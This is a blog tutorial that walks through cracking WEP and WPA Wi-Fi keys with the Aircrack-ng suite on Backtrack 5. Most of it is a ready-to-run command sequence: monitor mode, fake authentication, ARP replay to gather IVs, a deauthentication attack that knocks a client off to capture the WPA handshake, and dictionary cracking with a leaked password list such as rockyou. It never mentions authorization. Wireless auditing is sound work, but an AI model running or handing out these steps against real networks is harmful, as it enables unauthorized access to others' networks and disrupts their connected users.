Aircrack-ng is a suite of programs that allow for auditing of IEEE 802.11 networks. Below I will go over using the Aircrack-ng suit in Backtrack 5 to capture and crack WEP and WPA.
When cracking both WEP and WPA the steps are the same to a certain point. First we’ll set our wireless adapter up for injection operations.
airmon-ng stop wlan0
airmon-ng start wlan0
This has created the mon0 interface. Next lets see what APs are available to us.
airodump-ng wlan0
As you can see I had two APs available in the range of my wifi adapter. Lets target the TargetWiFi AP and test to make sure injection is enabled for our adapter.
aireplay-ng --test -e TargetWiFi -a 00:1C:10:AF:FA:4D mon0 --ignore-negative-one
| –test | is the flag that denotes we are testing injection | ||
| -e | specifies the ESSID of the AP | ||
| -a | specifies the BSSID of the AP | ||
| mon0 | is the monitor interface that was created when we started the monitor mode on wlan0 | ||
| –ignore-negative-one | is needed only if your adapter’s channel can not be determined |
The next step is to start the packet capture so we can capture IVs for WEP or the WPA Handshake for WPA/WPA2.
airodump-ng -c 11 --bssid 00:1C:10:AF:FA:4D -w TargetWiFi mon0
| -c | specifies the channel our target AP is on | ||
| –bssid | is the bssid of the target AP | ||
| -w | is the prefix for the capture file | ||
| mon0 | is the monitor interface that was created when we started the monitor mode on wlan0 |
WEP
Open a separate terminal window.
Let’s associate our adapter with the AP.
aireplay-ng -1 0 -e TargetWiFi -a 00:1C:10:AF:FA:4D -h 00:C0:CA:4A:D3:37 mon0
| -1 | tells aireplay-ng to fake an authentication with the AP | ||
| 0 | is the time between reauthentication attempts in seconds | ||
| -e | specifies the ESSID of the AP | ||
| -a | specifies the BSSID of the AP | ||
| -h | is the MAC of mon0 | ||
| mon0 | is the monitor interface that was created when we started the monitor mode on wlan0 |
If you receive an “Association successful 
” message then you have been associated to the AP. If you receive a “Got a deauthentication packet!” message you will need to slow your authentication tries down.
aireplay-ng -1 900 -o 1 -q 10 -e TargetWiFi -a 00:1C:10:AF:FA:4D -h 00:C0:CA:4A:D3:37 mon0
| -1 | tells aireplay-ng to fake an authentication with the AP | ||
| 900 | is the time between reauthentication attempts in seconds | ||
| -o | tells aireplay-ng to only send one set of authentication packets | ||
| -q | tells aireplay-ng to send keep alive packets every 10 seconds | ||
| -e | specifies the ESSID of the AP | ||
| -a | specifies the BSSID of the AP | ||
| -h | is the MAC of mon0 | ||
| mon0 | is the monitor interface that was created when we started the monitor mode on wlan0 |
Next, lets start generating IVs.
aireplay-ng -3 -b 00:1C:10:AF:FA:4D -h 00:C0:CA:4A:D3:37 mon0
| -3 | tells aireplay-ng to replay ARP Requests | ||
| -b | specifies the BSSID of the AP | ||
| -h | is the MAC of mon0 | ||
| mon0 | is the monitor interface that was created when we started the monitor mode on wlan0 |
Once you get around 40,000 or so packets stop the capture. Now it’s time to crack the WEP key.
aircrack-ng -b 00:1C:10:AF:FA:4D TargetWiFi*.cap
| -b | is the BSSID of the target AP | ||
| TargetWiFi*.cap | are the capture files that we started on the other terminal |
Dependent on the machine you are running this should take no time to get the WEP key.
WPA
If you are unable to acquire the WPA handshake after starting the capture (a client machine has not authenticated since starting the capture) then we can use aireplay-ng to deauthenticate a wireless client that is connected to the AP in another terminal window.
aireplay-ng -0 1 -a 00:1C:10:AF:FA:4D -c 68:A3:C4:34:FC:6F mon0
| -0 | tells aireplay-ng to go into deauth attack mode | ||
| 1 | tells aireplay-ng to deauth only 1 station | ||
| -a | is the BSSID of the target AP | ||
| -c | is the clients MAC address | ||
| mon0 | is the monitor interface that was created when we started the monitor mode on wlan0 |
Now that you have received the WPA handshake, stop the capture. Now it is time to crack the WPA key.
aircrack-ng -w password.txt -b 00:1C:10:AF:FA:4D TargetWiFi*.cap
| -w | is the password list that will be used to crack the WPA key | ||
| -b | is the BSSID of the target AP | ||
| TargetWiFi*.cap | are the capture files that we started on the other terminal |
The time it takes depends on the complexity of the key and the size of your password list. The rockyou.txt file I used contains hundreds of thousands of passwords. It came from Skull Security and they have a large collection of password lists you can download and use. Most password lists are composed of compromised unencrypted passwords. This means that the passwords in the lists are actual passwords that are being used.
If your password lists do not turn up any results for you, you can use Crunch and Pyrit to run through possible keys/passwords in real time. j0k3r has a nice writeup on how to accomplish this on Amazon EC2 GPU instances.
For more information on Aircrack-ng visit the Aircrack-ng website and check out their tutorials.
Pingback: Cracking Wireless Networks - Breaking Software